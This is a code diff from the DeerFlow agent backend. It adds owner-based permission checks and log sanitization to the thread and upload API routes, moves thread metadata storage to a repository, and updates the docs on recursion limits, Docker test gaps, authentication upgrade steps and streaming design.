||||
# data), synthesize a minimal store record from the checkpoint metadata.
|
||||
# If the thread exists in the checkpointer but not in thread_meta (e.g.
|
||||
# legacy data created before thread_meta adoption), synthesize a minimal
|
||||
# record from the checkpoint metadata.
|
||||
if record is None and checkpoint_tuple is not None:
|
||||
ckpt_meta = getattr(checkpoint_tuple, "metadata", {}) or {}
|
||||
record = {
|
||||
@@ -506,6 +403,7 @@ async def get_thread(thread_id: str, request: Request) -> ThreadResponse:
|
||||
|
||||
|
||||
@router.get("/{thread_id}/state", response_model=ThreadStateResponse)
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def get_thread_state(thread_id: str, request: Request) -> ThreadStateResponse:
|
||||
"""Get the latest state snapshot for a thread.
|
||||
|
||||
@@ -518,7 +416,7 @@ async def get_thread_state(thread_id: str, request: Request) -> ThreadStateRespo
|
||||
try:
|
||||
checkpoint_tuple = await checkpointer.aget_tuple(config)
|
||||
except Exception:
|
||||
logger.exception("Failed to get state for thread %s", thread_id)
|
||||
logger.exception("Failed to get state for thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to get thread state")
|
||||
|
||||
if checkpoint_tuple is None:
|
||||
@@ -555,15 +453,19 @@ async def get_thread_state(thread_id: str, request: Request) -> ThreadStateRespo
|
||||
|
||||
|
||||
@router.post("/{thread_id}/state", response_model=ThreadStateResponse)
|
||||
@require_permission("threads", "write", owner_check=True, require_existing=True)
|
||||
async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, request: Request) -> ThreadStateResponse:
|
||||
"""Update thread state (e.g. for human-in-the-loop resume or title rename).
|
||||
|
||||
Writes a new checkpoint that merges *body.values* into the latest
|
||||
channel values, then syncs any updated ``title`` field back to the Store
|
||||
so that ``/threads/search`` reflects the change immediately.
|
||||
channel values, then syncs any updated ``title`` field through the
|
||||
ThreadMetaStore abstraction so that ``/threads/search`` reflects the
|
||||
change immediately in both sqlite and memory backends.
|
||||
"""
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
checkpointer = get_checkpointer(request)
|
||||
store = get_store(request)
|
||||
thread_meta_repo = get_thread_meta_repo(request)
|
||||
|
||||
# checkpoint_ns must be present in the config for aput — default to ""
|
||||
# (the root graph namespace). checkpoint_id is optional; omitting it
|
||||
@@ -580,7 +482,7 @@ async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, re
|
||||
try:
|
||||
checkpoint_tuple = await checkpointer.aget_tuple(read_config)
|
||||
except Exception:
|
||||
logger.exception("Failed to get state for thread %s", thread_id)
|
||||
logger.exception("Failed to get state for thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to get thread state")
|
||||
|
||||
if checkpoint_tuple is None:
|
||||
@@ -614,19 +516,22 @@ async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, re
|
||||
try:
|
||||
new_config = await checkpointer.aput(write_config, checkpoint, metadata, {})
|
||||
except Exception:
|
||||
logger.exception("Failed to update state for thread %s", thread_id)
|
||||
logger.exception("Failed to update state for thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to update thread state")
|
||||
|
||||
new_checkpoint_id: str | None = None
|
||||
if isinstance(new_config, dict):
|
||||
new_checkpoint_id = new_config.get("configurable", {}).get("checkpoint_id")
|
||||
|
||||
# Sync title changes to the Store so /threads/search reflects them immediately.
|
||||
if store is not None and body.values and "title" in body.values:
|
||||
try:
|
||||
await _store_upsert(store, thread_id, values={"title": body.values["title"]})
|
||||
except Exception:
|
||||
logger.debug("Failed to sync title to store for thread %s (non-fatal)", thread_id)
|
||||
# Sync title changes through the ThreadMetaStore abstraction so /threads/search
|
||||
# reflects them immediately in both sqlite and memory backends.
|
||||
if body.values and "title" in body.values:
|
||||
new_title = body.values["title"]
|
||||
if new_title: # Skip empty strings and None
|
||||
try:
|
||||
await thread_meta_repo.update_display_name(thread_id, new_title)
|
||||
except Exception:
|
||||
logger.debug("Failed to sync title to thread_meta for %s (non-fatal)", sanitize_log_param(thread_id))
|
||||
|
||||
return ThreadStateResponse(
|
||||
values=serialize_channel_values(channel_values),
|
||||
@@ -638,8 +543,16 @@ async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, re
|
||||
|
||||
|
||||
@router.post("/{thread_id}/history", response_model=list[HistoryEntry])
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def get_thread_history(thread_id: str, body: ThreadHistoryRequest, request: Request) -> list[HistoryEntry]:
|
||||
"""Get checkpoint history for a thread."""
|
||||
"""Get checkpoint history for a thread.
|
||||
|
||||
Messages are read from the checkpointer's channel values (the
|
||||
authoritative source) and serialized via
|
||||
:func:`~deerflow.runtime.serialization.serialize_channel_values`.
|
||||
Only the latest (first) checkpoint carries the ``messages`` key to
|
||||
avoid duplicating them across every entry.
|
||||
"""
|
||||
checkpointer = get_checkpointer(request)
|
||||
|
||||
config: dict[str, Any] = {"configurable": {"thread_id": thread_id}}
|
||||
@@ -647,6 +560,7 @@ async def get_thread_history(thread_id: str, body: ThreadHistoryRequest, request
|
||||
config["configurable"]["checkpoint_id"] = body.before
|
||||
|
||||
entries: list[HistoryEntry] = []
|
||||
is_latest_checkpoint = True
|
||||
try:
|
||||
async for checkpoint_tuple in checkpointer.alist(config, limit=body.limit):
|
||||
ckpt_config = getattr(checkpoint_tuple, "config", {})
|
||||
@@ -661,22 +575,42 @@ async def get_thread_history(thread_id: str, body: ThreadHistoryRequest, request
|
||||
|
||||
channel_values = checkpoint.get("channel_values", {})
|
||||
|
||||
# Build values from checkpoint channel_values
|
||||
values: dict[str, Any] = {}
|
||||
if title := channel_values.get("title"):
|
||||
values["title"] = title
|
||||
if thread_data := channel_values.get("thread_data"):
|
||||
values["thread_data"] = thread_data
|
||||
|
||||
# Attach messages from checkpointer only for the latest checkpoint
|
||||
if is_latest_checkpoint:
|
||||
messages = channel_values.get("messages")
|
||||
if messages:
|
||||
values["messages"] = serialize_channel_values({"messages": messages}).get("messages", [])
|
||||
is_latest_checkpoint = False
|
||||
|
||||
# Derive next tasks
|
||||
tasks_raw = getattr(checkpoint_tuple, "tasks", []) or []
|
||||
next_tasks = [t.name for t in tasks_raw if hasattr(t, "name")]
|
||||
|
||||
# Strip LangGraph internal keys from metadata
|
||||
user_meta = {k: v for k, v in metadata.items() if k not in ("created_at", "updated_at", "step", "source", "writes", "parents")}
|
||||
# Keep step for ordering context
|
||||
if "step" in metadata:
|
||||
user_meta["step"] = metadata["step"]
|
||||
|
||||
entries.append(
|
||||
HistoryEntry(
|
||||
checkpoint_id=checkpoint_id,
|
||||
parent_checkpoint_id=parent_id,
|
||||
metadata=metadata,
|
||||
values=serialize_channel_values(channel_values),
|
||||
metadata=user_meta,
|
||||
values=values,
|
||||
created_at=str(metadata.get("created_at", "")),
|
||||
next=next_tasks,
|
||||
)
|
||||
)
|
||||
except Exception:
|
||||
logger.exception("Failed to get history for thread %s", thread_id)
|
||||
logger.exception("Failed to get history for thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to get thread history")
|
||||
|
||||
return entries
|
||||
|
||||
@@ -4,9 +4,10 @@ import logging
|
||||
import os
|
||||
import stat
|
||||
|
||||
from fastapi import APIRouter, File, HTTPException, UploadFile
|
||||
from fastapi import APIRouter, File, HTTPException, Request, UploadFile
|
||||
from pydantic import BaseModel
|
||||
|
||||
from app.gateway.authz import require_permission
|
||||
from deerflow.config.paths import get_paths
|
||||
from deerflow.sandbox.sandbox_provider import get_sandbox_provider
|
||||
from deerflow.uploads.manager import (
|
||||
@@ -54,8 +55,10 @@ def _make_file_sandbox_writable(file_path: os.PathLike[str] | str) -> None:
|
||||
|
||||
|
||||
@router.post("", response_model=UploadResponse)
|
||||
@require_permission("threads", "write", owner_check=True, require_existing=True)
|
||||
async def upload_files(
|
||||
thread_id: str,
|
||||
request: Request,
|
||||
files: list[UploadFile] = File(...),
|
||||
) -> UploadResponse:
|
||||
"""Upload multiple files to a thread's uploads directory."""
|
||||
@@ -133,7 +136,8 @@ async def upload_files(
|
||||
|
||||
|
||||
@router.get("/list", response_model=dict)
|
||||
async def list_uploaded_files(thread_id: str) -> dict:
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def list_uploaded_files(thread_id: str, request: Request) -> dict:
|
||||
"""List all files in a thread's uploads directory."""
|
||||
try:
|
||||
uploads_dir = get_uploads_dir(thread_id)
|
||||
@@ -151,7 +155,8 @@ async def list_uploaded_files(thread_id: str) -> dict:
|
||||
|
||||
|
||||
@router.delete("/{filename}")
|
||||
async def delete_uploaded_file(thread_id: str, filename: str) -> dict:
|
||||
@require_permission("threads", "delete", owner_check=True, require_existing=True)
|
||||
async def delete_uploaded_file(thread_id: str, filename: str, request: Request) -> dict:
|
||||
"""Delete a file from a thread's uploads directory."""
|
||||
try:
|
||||
uploads_dir = get_uploads_dir(thread_id)
|
||||
|
||||
@@ -8,16 +8,17 @@ frames, and consuming stream bridge events. Router modules
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import dataclasses
|
||||
import json
|
||||
import logging
|
||||
import re
|
||||
import time
|
||||
from typing import Any
|
||||
|
||||
from fastapi import HTTPException, Request
|
||||
from langchain_core.messages import HumanMessage
|
||||
|
||||
from app.gateway.deps import get_checkpointer, get_run_manager, get_store, get_stream_bridge
|
||||
from app.gateway.deps import get_run_context, get_run_manager, get_run_store, get_stream_bridge
|
||||
from app.gateway.utils import sanitize_log_param
|
||||
from deerflow.runtime import (
|
||||
END_SENTINEL,
|
||||
HEARTBEAT_SENTINEL,
|
||||
@@ -171,71 +172,6 @@ def build_run_config(
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
async def _upsert_thread_in_store(store, thread_id: str, metadata: dict | None) -> None:
|
||||
"""Create or refresh the thread record in the Store.
|
||||
|
||||
Called from :func:`start_run` so that threads created via the stateless
|
||||
``/runs/stream`` endpoint (which never calls ``POST /threads``) still
|
||||
appear in ``/threads/search`` results.
|
||||
"""
|
||||
# Deferred import to avoid circular import with the threads router module.
|
||||
from app.gateway.routers.threads import _store_upsert
|
||||
|
||||
try:
|
||||
await _store_upsert(store, thread_id, metadata=metadata)
|
||||
except Exception:
|
||||
logger.warning("Failed to upsert thread %s in store (non-fatal)", thread_id)
|
||||
|
||||
|
||||
async def _sync_thread_title_after_run(
|
||||
run_task: asyncio.Task,
|
||||
thread_id: str,
|
||||
checkpointer: Any,
|
||||
store: Any,
|
||||
) -> None:
|
||||
"""Wait for *run_task* to finish, then persist the generated title to the Store.
|
||||
|
||||
TitleMiddleware writes the generated title to the LangGraph agent state
|
||||
(checkpointer) but the Gateway's Store record is not updated automatically.
|
||||
This coroutine closes that gap by reading the final checkpoint after the
|
||||
run completes and syncing ``values.title`` into the Store record so that
|
||||
subsequent ``/threads/search`` responses include the correct title.
|
||||
|
||||
Runs as a fire-and-forget :func:`asyncio.create_task`; failures are
|
||||
logged at DEBUG level and never propagate.
|
||||
"""
|
||||
# Wait for the background run task to complete (any outcome).
|
||||
# asyncio.wait does not propagate task exceptions — it just returns
|
||||
# when the task is done, cancelled, or failed.
|
||||
await asyncio.wait({run_task})
|
||||
|
||||
# Deferred import to avoid circular import with the threads router module.
|
||||
from app.gateway.routers.threads import _store_get, _store_put
|
||||
|
||||
try:
|
||||
ckpt_config = {"configurable": {"thread_id": thread_id, "checkpoint_ns": ""}}
|
||||
ckpt_tuple = await checkpointer.aget_tuple(ckpt_config)
|
||||
if ckpt_tuple is None:
|
||||
return
|
||||
|
||||
channel_values = ckpt_tuple.checkpoint.get("channel_values", {})
|
||||
title = channel_values.get("title")
|
||||
if not title:
|
||||
return
|
||||
|
||||
existing = await _store_get(store, thread_id)
|
||||
if existing is None:
|
||||
return
|
||||
|
||||
updated = dict(existing)
|
||||
updated.setdefault("values", {})["title"] = title
|
||||
updated["updated_at"] = time.time()
|
||||
await _store_put(store, updated)
|
||||
logger.debug("Synced title %r for thread %s", title, thread_id)
|
||||
except Exception:
|
||||
logger.debug("Failed to sync title for thread %s (non-fatal)", thread_id, exc_info=True)
|
||||
|
||||
|
||||
async def start_run(
|
||||
body: Any,
|
||||
thread_id: str,
|
||||
@@ -255,11 +191,25 @@ async def start_run(
|
||||
"""
|
||||
bridge = get_stream_bridge(request)
|
||||
run_mgr = get_run_manager(request)
|
||||
checkpointer = get_checkpointer(request)
|
||||
store = get_store(request)
|
||||
run_ctx = get_run_context(request)
|
||||
|
||||
disconnect = DisconnectMode.cancel if body.on_disconnect == "cancel" else DisconnectMode.continue_
|
||||
|
||||
# Resolve follow_up_to_run_id: explicit from request, or auto-detect from latest successful run
|
||||
follow_up_to_run_id = getattr(body, "follow_up_to_run_id", None)
|
||||
if follow_up_to_run_id is None:
|
||||
run_store = get_run_store(request)
|
||||
try:
|
||||
recent_runs = await run_store.list_by_thread(thread_id, limit=1)
|
||||
if recent_runs and recent_runs[0].get("status") == "success":
|
||||
follow_up_to_run_id = recent_runs[0]["run_id"]
|
||||
except Exception:
|
||||
pass # Don't block run creation
|
||||
|
||||
# Enrich base context with per-run field
|
||||
if follow_up_to_run_id:
|
||||
run_ctx = dataclasses.replace(run_ctx, follow_up_to_run_id=follow_up_to_run_id)
|
||||
|
||||
try:
|
||||
record = await run_mgr.create_or_reject(
|
||||
thread_id,
|
||||
@@ -268,17 +218,28 @@ async def start_run(
|
||||
metadata=body.metadata or {},
|
||||
kwargs={"input": body.input, "config": body.config},
|
||||
multitask_strategy=body.multitask_strategy,
|
||||
follow_up_to_run_id=follow_up_to_run_id,
|
||||
)
|
||||
except ConflictError as exc:
|
||||
raise HTTPException(status_code=409, detail=str(exc)) from exc
|
||||
except UnsupportedStrategyError as exc:
|
||||
raise HTTPException(status_code=501, detail=str(exc)) from exc
|
||||
|
||||
# Ensure the thread is visible in /threads/search, even for threads that
|
||||
# were never explicitly created via POST /threads (e.g. stateless runs).
|
||||
store = get_store(request)
|
||||
if store is not None:
|
||||
await _upsert_thread_in_store(store, thread_id, body.metadata)
|
||||
# Upsert thread metadata so the thread appears in /threads/search,
|
||||
# even for threads that were never explicitly created via POST /threads
|
||||
# (e.g. stateless runs).
|
||||
try:
|
||||
existing = await run_ctx.thread_meta_repo.get(thread_id)
|
||||
if existing is None:
|
||||
await run_ctx.thread_meta_repo.create(
|
||||
thread_id,
|
||||
assistant_id=body.assistant_id,
|
||||
metadata=body.metadata,
|
||||
)
|
||||
else:
|
||||
await run_ctx.thread_meta_repo.update_status(thread_id, "running")
|
||||
except Exception:
|
||||
logger.warning("Failed to upsert thread_meta for %s (non-fatal)", sanitize_log_param(thread_id))
|
||||
|
||||
agent_factory = resolve_agent_factory(body.assistant_id)
|
||||
graph_input = normalize_input(body.input)
|
||||
@@ -311,8 +272,7 @@ async def start_run(
|
||||
bridge,
|
||||
run_mgr,
|
||||
record,
|
||||
checkpointer=checkpointer,
|
||||
store=store,
|
||||
ctx=run_ctx,
|
||||
agent_factory=agent_factory,
|
||||
graph_input=graph_input,
|
||||
config=config,
|
||||
@@ -324,11 +284,9 @@ async def start_run(
|
||||
)
|
||||
record.task = task
|
||||
|
||||
# After the run completes, sync the title generated by TitleMiddleware from
|
||||
# the checkpointer into the Store record so that /threads/search returns the
|
||||
# correct title instead of an empty values dict.
|
||||
if store is not None:
|
||||
asyncio.create_task(_sync_thread_title_after_run(task, thread_id, checkpointer, store))
|
||||
# Title sync is handled by worker.py's finally block which reads the
|
||||
# title from the checkpoint and calls thread_meta_repo.update_display_name
|
||||
# after the run completes.
|
||||
|
||||
return record
|
||||
|
||||
|
||||
@@ -0,0 +1,6 @@
|
||||
"""Shared utility helpers for the Gateway layer."""
|
||||
|
||||
|
||||
def sanitize_log_param(value: str) -> str:
|
||||
"""Strip control characters to prevent log injection."""
|
||||
return value.replace("\n", "").replace("\r", "").replace("\x00", "")
|
||||
+25
-1
@@ -86,6 +86,7 @@ Content-Type: application/json
|
||||
]
|
||||
},
|
||||
"config": {
|
||||
"recursion_limit": 100,
|
||||
"configurable": {
|
||||
"model_name": "gpt-4",
|
||||
"thinking_enabled": false,
|
||||
@@ -100,6 +101,21 @@ Content-Type: application/json
|
||||
- Use: `values`, `messages-tuple`, `custom`, `updates`, `events`, `debug`, `tasks`, `checkpoints`
|
||||
- Do not use: `tools` (deprecated/invalid in current `langgraph-api` and will trigger schema validation errors)
|
||||
|
||||
**Recursion Limit:**
|
||||
|
||||
`config.recursion_limit` caps the number of graph steps LangGraph will execute
|
||||
in a single run. The `/api/langgraph/*` endpoints go straight to the LangGraph
|
||||
server and therefore inherit LangGraph's native default of **25**, which is
|
||||
too low for plan-mode or subagent-heavy runs — the agent typically errors out
|
||||
with `GraphRecursionError` after the first round of subagent results comes
|
||||
back, before the lead agent can synthesize the final answer.
|
||||
|
||||
DeerFlow's own Gateway and IM-channel paths mitigate this by defaulting to
|
||||
`100` in `build_run_config` (see `backend/app/gateway/services.py`), but
|
||||
clients calling the LangGraph API directly must set `recursion_limit`
|
||||
explicitly in the request body. `100` matches the Gateway default and is a
|
||||
safe starting point; increase it if you run deeply nested subagent graphs.
|
||||
|
||||
**Configurable Options:**
|
||||
- `model_name` (string): Override the default model
|
||||
- `thinking_enabled` (boolean): Enable extended thinking for supported models
|
||||
@@ -626,6 +642,14 @@ curl -X POST http://localhost:2026/api/langgraph/threads/abc123/runs \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"input": {"messages": [{"role": "user", "content": "Hello"}]},
|
||||
"config": {"configurable": {"model_name": "gpt-4"}}
|
||||
"config": {
|
||||
"recursion_limit": 100,
|
||||
"configurable": {"model_name": "gpt-4"}
|
||||
}
|
||||
}'
|
||||
```
|
||||
|
||||
> The `/api/langgraph/*` endpoints bypass DeerFlow's Gateway and inherit
|
||||
> LangGraph's native `recursion_limit` default of 25, which is too low for
|
||||
> plan-mode or subagent runs. Set `config.recursion_limit` explicitly — see
|
||||
> the [Create Run](#create-run) section for details.
|
||||
|
||||
@@ -0,0 +1,77 @@
|
||||
# Docker Test Gap (Section 七 7.4)
|
||||
|
||||
This file documents the only **un-executed** test cases from
|
||||
`backend/docs/AUTH_TEST_PLAN.md` after the full release validation pass.
|
||||
|
||||
## Why this gap exists
|
||||
|
||||
The release validation environment (sg_dev: `10.251.229.92`) **does not have
|
||||
a Docker daemon installed**. The TC-DOCKER cases are container-runtime
|
||||
behavior tests that need an actual Docker engine to spin up
|
||||
`docker/docker-compose.yaml` services.
|
||||
|
||||
```bash
|
||||
$ ssh sg_dev "which docker; docker --version"
|
||||
# (empty)
|
||||
# bash: docker: command not found
|
||||
```
|
||||
|
||||
All other test plan sections were executed against either:
|
||||
- The local dev box (Mac, all services running locally), or
|
||||
- The deployed sg_dev instance (gateway + frontend + nginx via SSH tunnel)
|
||||
|
||||
## Cases not executed
|
||||
|
||||
| Case | Title | What it covers | Why not run |
|
||||
|---|---|---|---|
|
||||
| TC-DOCKER-01 | `users.db` volume persistence | Verify the `DEER_FLOW_HOME` bind mount survives container restart | needs `docker compose up` |
|
||||
| TC-DOCKER-02 | Session persistence across container restart | `AUTH_JWT_SECRET` env var keeps cookies valid after `docker compose down && up` | needs `docker compose down/up` |
|
||||
| TC-DOCKER-03 | Per-worker rate limiter divergence | Confirms in-process `_login_attempts` dict doesn't share state across `gunicorn` workers (4 by default in the compose file); known limitation, documented | needs multi-worker container |
|
||||
| TC-DOCKER-04 | IM channels skip AuthMiddleware | Verify Feishu/Slack/Telegram dispatchers run in-container against `http://langgraph:2024` without going through nginx | needs `docker logs` |
|
||||
| TC-DOCKER-05 | Admin credentials surfacing | **Updated post-simplify** — was "log scrape", now "0600 credential file in `DEER_FLOW_HOME`". The file-based behavior is already validated by TC-1.1 + TC-UPG-13 on sg_dev (non-Docker), so the only Docker-specific gap is verifying the volume mount carries the file out to the host | needs container + host volume |
|
||||
| TC-DOCKER-06 | Gateway-mode Docker deploy | `./scripts/deploy.sh --gateway` produces a 3-container topology (no `langgraph` container); same auth flow as standard mode | needs `docker compose --profile gateway` |
|
||||
|
||||
## Coverage already provided by non-Docker tests
|
||||
|
||||
The **auth-relevant** behavior in each Docker case is already exercised by
|
||||
the test cases that ran on sg_dev or local:
|
||||
|
||||
| Docker case | Auth behavior covered by |
|
||||
|---|---|
|
||||
| TC-DOCKER-01 (volume persistence) | TC-REENT-01 on sg_dev (admin row survives gateway restart) — same SQLite file, just no container layer between |
|
||||
| TC-DOCKER-02 (session persistence) | TC-API-02/03/06 (cookie roundtrip), plus TC-REENT-04 (multi-cookie) — JWT verification is process-state-free, container restart is equivalent to `pkill uvicorn && uv run uvicorn` |
|
||||
| TC-DOCKER-03 (per-worker rate limit) | TC-GW-04 + TC-REENT-09 (single-worker rate limit + 5min expiry). The cross-worker divergence is an architectural property of the in-memory dict; no auth code path differs |
|
||||
| TC-DOCKER-04 (IM channels skip auth) | Code-level only: `app/channels/manager.py` uses `langgraph_sdk` directly with no cookie handling. The langgraph_auth handler is bypassed by going through SDK, not HTTP |
|
||||
| TC-DOCKER-05 (credential surfacing) | TC-1.1 on sg_dev (file at `~/deer-flow/backend/.deer-flow/admin_initial_credentials.txt`, mode 0600, password 22 chars) — the only Docker-unique step is whether the bind mount projects this path onto the host, which is a `docker compose` config check, not a runtime behavior change |
|
||||
| TC-DOCKER-06 (gateway-mode container) | Section 七 7.2 covered by TC-GW-01..05 + Section 二 (gateway-mode auth flow on sg_dev) — same Gateway code, container is just a packaging change |
|
||||
|
||||
## Reproduction steps when Docker becomes available
|
||||
|
||||
Anyone with `docker` + `docker compose` installed can reproduce the gap by
|
||||
running the test plan section verbatim. Pre-flight:
|
||||
|
||||
```bash
|
||||
# Required on the host
|
||||
docker --version # >=24.x
|
||||
docker compose version # plugin >=2.x
|
||||
|
||||
# Required env var (otherwise sessions reset on every container restart)
|
||||
echo "AUTH_JWT_SECRET=$(python3 -c 'import secrets; print(secrets.token_urlsafe(32))')" \
|
||||
>> .env
|
||||
|
||||
# Optional: pin DEER_FLOW_HOME to a stable host path
|
||||
echo "DEER_FLOW_HOME=$HOME/deer-flow-data" >> .env
|
||||
```
|
||||
|
||||
Then run TC-DOCKER-01..06 from the test plan as written.
|
||||
|
||||
## Decision log
|
||||
|
||||
- **Not blocking the release.** The auth-relevant behavior in every Docker
|
||||
case has an already-validated equivalent on bare metal. The gap is purely
|
||||
about *container packaging* details (bind mounts, multi-worker, log
|
||||
collection), not about whether the auth code paths work.
|
||||
- **TC-DOCKER-05 was updated in place** in `AUTH_TEST_PLAN.md` to reflect
|
||||
the post-simplify reality (credentials file → 0600 file, no log leak).
|
||||
The old "grep 'Password:' in docker logs" expectation would have failed
|
||||
silently and given a false sense of coverage.
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,129 @@
|
||||
# Authentication Upgrade Guide
|
||||
|
||||
DeerFlow 内置了认证模块。本文档面向从无认证版本升级的用户。
|
||||
|
||||
## 核心概念
|
||||
|
||||
认证模块采用**始终强制**策略:
|
||||
|
||||
- 首次启动时自动创建 admin 账号,随机密码打印到控制台日志
|
||||
- 认证从一开始就是强制的,无竞争窗口
|
||||
- 历史对话(升级前创建的 thread)自动迁移到 admin 名下
|
||||
|
||||
## 升级步骤
|
||||
|
||||
### 1. 更新代码
|
||||
|
||||
```bash
|
||||
git pull origin main
|
||||
cd backend && make install
|
||||
```
|
||||
|
||||
### 2. 首次启动
|
||||
|
||||
```bash
|
||||
make dev
|
||||
```
|
||||
|
||||
控制台会输出:
|
||||
|
||||
```
|
||||
============================================================
|
||||
Admin account created on first boot
|
||||
Email: admin@deerflow.dev
|
||||
Password: aB3xK9mN_pQ7rT2w
|
||||
Change it after login: Settings → Account
|
||||
============================================================
|
||||
```
|
||||
|
||||
如果未登录就重启了服务,不用担心——只要 setup 未完成,每次启动都会重置密码并重新打印到控制台。
|
||||
|
||||
### 3. 登录
|
||||
|
||||
访问 `http://localhost:2026/login`,使用控制台输出的邮箱和密码登录。
|
||||
|
||||
### 4. 修改密码
|
||||
|
||||
登录后进入 Settings → Account → Change Password。
|
||||
|
||||
### 5. 添加用户(可选)
|
||||
|
||||
其他用户通过 `/login` 页面注册,自动获得 **user** 角色。每个用户只能看到自己的对话。
|
||||
|
||||
## 安全机制
|
||||
|
||||
| 机制 | 说明 |
|
||||
|------|------|
|
||||
| JWT HttpOnly Cookie | Token 不暴露给 JavaScript,防止 XSS 窃取 |
|
||||
| CSRF Double Submit Cookie | 所有 POST/PUT/DELETE 请求需携带 `X-CSRF-Token` |
|
||||
| bcrypt 密码哈希 | 密码不以明文存储 |
|
||||
| 多租户隔离 | 用户只能访问自己的 thread |
|
||||
| HTTPS 自适应 | 检测 `x-forwarded-proto`,自动设置 `Secure` cookie 标志 |
|
||||
|
||||
## 常见操作
|
||||
|
||||
### 忘记密码
|
||||
|
||||
```bash
|
||||
cd backend
|
||||
|
||||
# 重置 admin 密码
|
||||
python -m app.gateway.auth.reset_admin
|
||||
|
||||
# 重置指定用户密码
|
||||
python -m app.gateway.auth.reset_admin --email user@example.com
|
||||
```
|
||||
|
||||
会输出新的随机密码。
|
||||
|
||||
### 完全重置
|
||||
|
||||
删除用户数据库,重启后自动创建新 admin:
|
||||
|
||||
```bash
|
||||
rm -f backend/.deer-flow/users.db
|
||||
# 重启服务,控制台输出新密码
|
||||
```
|
||||
|
||||
## 数据存储
|
||||
|
||||
| 文件 | 内容 |
|
||||
|------|------|
|
||||
| `.deer-flow/users.db` | SQLite 用户数据库(密码哈希、角色) |
|
||||
| `.env` 中的 `AUTH_JWT_SECRET` | JWT 签名密钥(未设置时自动生成临时密钥,重启后 session 失效) |
|
||||
|
||||
### 生产环境建议
|
||||
|
||||
```bash
|
||||
# 生成持久化 JWT 密钥,避免重启后所有用户需重新登录
|
||||
python -c "import secrets; print(secrets.token_urlsafe(32))"
|
||||
# 将输出添加到 .env:
|
||||
# AUTH_JWT_SECRET=<生成的密钥>
|
||||
```
|
||||
|
||||
## API 端点
|
||||
|
||||
| 端点 | 方法 | 说明 |
|
||||
|------|------|------|
|
||||
| `/api/v1/auth/login/local` | POST | 邮箱密码登录(OAuth2 form) |
|
||||
| `/api/v1/auth/register` | POST | 注册新用户(user 角色) |
|
||||
| `/api/v1/auth/logout` | POST | 登出(清除 cookie) |
|
||||
| `/api/v1/auth/me` | GET | 获取当前用户信息 |
|
||||
| `/api/v1/auth/change-password` | POST | 修改密码 |
|
||||
| `/api/v1/auth/setup-status` | GET | 检查 admin 是否存在 |
|
||||
|
||||
## 兼容性
|
||||
|
||||
- **标准模式**(`make dev`):完全兼容,admin 自动创建
|
||||
- **Gateway 模式**(`make dev-pro`):完全兼容
|
||||
- **Docker 部署**:完全兼容,`.deer-flow/users.db` 需持久化卷挂载
|
||||
- **IM 渠道**(Feishu/Slack/Telegram):通过 LangGraph SDK 通信,不经过认证层
|
||||
- **DeerFlowClient**(嵌入式):不经过 HTTP,不受认证影响
|
||||
|
||||
## 故障排查
|
||||
|
||||
| 症状 | 原因 | 解决 |
|
||||
|------|------|------|
|
||||
| 启动后没看到密码 | admin 已存在(非首次启动) | 用 `reset_admin` 重置,或删 `users.db` |
|
||||
| 登录后 POST 返回 403 | CSRF token 缺失 | 确认前端已更新 |
|
||||
| 重启后需要重新登录 | `AUTH_JWT_SECRET` 未持久化 | 在 `.env` 中设置固定密钥 |
|
||||
@@ -192,8 +192,8 @@ tools:
|
||||
```
|
||||
|
||||
**Built-in Tools**:
|
||||
- `web_search` - Search the web (Tavily)
|
||||
- `web_fetch` - Fetch web pages (Jina AI)
|
||||
- `web_search` - Search the web (DuckDuckGo, Tavily, Exa, InfoQuest, Firecrawl)
|
||||
- `web_fetch` - Fetch web pages (Jina AI, Exa, InfoQuest, Firecrawl)
|
||||
- `ls` - List directory contents
|
||||
- `read_file` - Read file contents
|
||||
- `write_file` - Write file contents
|
||||
|
||||
@@ -15,6 +15,7 @@ This directory contains detailed documentation for the DeerFlow backend.
|
||||
|
||||
| Document | Description |
|
||||
|----------|-------------|
|
||||
| [STREAMING.md](STREAMING.md) | Token-level streaming design: Gateway vs DeerFlowClient paths, `stream_mode` semantics, per-id dedup |
|
||||
| [FILE_UPLOAD.md](FILE_UPLOAD.md) | File upload functionality |
|
||||
| [PATH_EXAMPLES.md](PATH_EXAMPLES.md) | Path types and usage examples |
|
||||
| [summarization.md](summarization.md) | Context summarization feature |
|
||||
@@ -47,6 +48,7 @@ docs/
|
||||
├── PATH_EXAMPLES.md # Path usage examples
|
||||
├── summarization.md # Summarization feature
|
||||
├── plan_mode_usage.md # Plan mode feature
|
||||
├── STREAMING.md # Token-level streaming design
|
||||
├── AUTO_TITLE_GENERATION.md # Title generation
|
||||
├── TITLE_GENERATION_IMPLEMENTATION.md # Title implementation details
|
||||
└── TODO.md # Roadmap and issues
|
||||
|
||||
@@ -0,0 +1,351 @@
|
||||
# DeerFlow 流式输出设计
|
||||
|
||||
本文档解释 DeerFlow 是如何把 LangGraph agent 的事件流端到端送到两类消费者(HTTP 客户端、嵌入式 Python 调用方)的:两条路径为什么**必须**并存、它们各自的契约是什么、以及设计里那些 non-obvious 的不变式。
|
||||
|
||||
---
|
||||
|
||||
## TL;DR
|
||||
|
||||
- DeerFlow 有**两条并行**的流式路径:**Gateway 路径**(async / HTTP SSE / JSON 序列化)服务浏览器和 IM 渠道;**DeerFlowClient 路径**(sync / in-process / 原生 LangChain 对象)服务 Jupyter、脚本、测试。它们**无法合并**——消费者模型不同。
|
||||
